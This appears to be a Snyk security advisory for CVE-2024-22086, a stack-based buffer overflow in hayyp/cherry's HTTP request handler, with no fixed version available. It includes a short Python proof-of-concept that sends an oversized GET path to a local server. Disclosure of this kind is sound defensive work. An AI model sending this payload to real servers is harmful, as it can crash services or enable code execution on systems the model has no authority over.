Out-of-bounds Write Affecting hayyp/cherry package, versions [0,]


Severity

Recommended
0.0
critical
0
10

CVSS assessment by Snyk's Security Team. Learn more

Threat Intelligence

Exploit Maturity
Proof of Concept
EPSS
5.83% (91st percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk IDSNYK-UNMANAGED-HAYYPCHERRY-6144801
  • published5 Jan 2024
  • disclosed5 Jan 2024
  • creditHalcy0nic

Introduced: 5 Jan 2024

CVE-2024-22086  (opens in a new tab)
CWE-787  (opens in a new tab)

How to fix?

There is no fixed version for hayyp/cherry.

Overview

Affected versions of this package are vulnerable to Out-of-bounds Write via the handle_request function in http.c. An attacker can execute arbitrary code by sending a specially crafted URI that triggers a stack-based buffer overflow.

PoC

#!/usr/bin/env python3

import socket

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(("localhost", 3333))
sock.send(b"GET /"+b"C"*2000000+b"HTTP/1.1\r\nHost:localhost:3333\r\n\r\n")
response = sock.recv(4096)
sock.close()

References

CVSS Base Scores

version 3.1